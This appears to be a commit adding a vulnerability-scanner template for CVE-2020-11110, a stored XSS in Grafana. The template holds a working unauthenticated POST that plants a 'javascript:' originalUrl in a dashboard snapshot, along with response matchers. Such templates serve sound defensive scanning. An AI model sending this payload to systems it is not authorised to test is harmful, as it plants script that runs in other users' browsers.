Added CVE-2020-11110

2021-06-20 20:00:19 +05:30 · 2021-06-20 20:00:19 +05:30 · c7a11cd1b1
parent a626727b53
commit c7a11cd1b1
1 changed files with 48 additions and 0 deletions
--- a/cves/2020/CVE-2020-11110.yaml
+++ b/cves/2020/CVE-2020-11110.yaml
@ -0,0 +1,48 @@
+id: CVE-2020-11110
+
+info:
+  author: emadshanab
+  severity: medium
+  name: Grafana Unauthenticated Stored XSS
+  description: Grafana through 6.7.1 allows stored XSS due to insufficient input protection in the originalUrl field, which allows an attacker to inject JavaScript code that will be executed after clicking on Open Original Dashboard after visiting the snapshot.
+  tags: cve,cve2020,xss,grafana
+  reference: |
+    - https://ctf-writeup.revers3c.com/challenges/web/CVE-2020-11110/index.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-11110
+requests:
+  - raw:
+      - |
+        POST /api/snapshots HTTP/1.1
+        Host: {{Hostname}}
+        Accept: application/json, text/plain, */*
+        Accept-Language: en-US,en;q=0.5
+        Referer: {{BaseURL}}
+        content-type: application/json
+        Connection: close
+
+        {"dashboard":{"annotations":{"list":[{"name":"Annotations & Alerts","enable":true,"iconColor":"rgba(0, 211, 255, 1)","type":"dashboard","builtIn":1,"hide":true}]},"editable":true,"gnetId":null,"graphTooltip":0,"id":null,"links":[],"panels":[],"schemaVersion":18,"snapshot":{"originalUrl":"javascript:alert('Revers3c')","timestamp":"2020-03-30T01:24:44.529Z"},"style":"dark","tags":[],"templating":{"list":[]},"time":{"from":null,"to":"2020-03-30T01:24:53.549Z","raw":{"from":"6h","to":"now"}},"timepicker":{"refresh_intervals":["5s","10s","30s","1m","5m","15m","30m","1h","2h","1d"],"time_options":["5m","15m","1h","6h","12h","24h","2d","7d","30d"]},"timezone":"","title":"Dashboard","uid":null,"version":0},"name":"Dashboard","expires":0}
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: header
+        words:
+          - application/json
+
+      - type: word
+        part: body
+        words:
+          - '"deleteKey":'
+          - '"deleteUrl":'
+        condition: and
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - '"url":"([a-z:/0-9A-Z]+)"'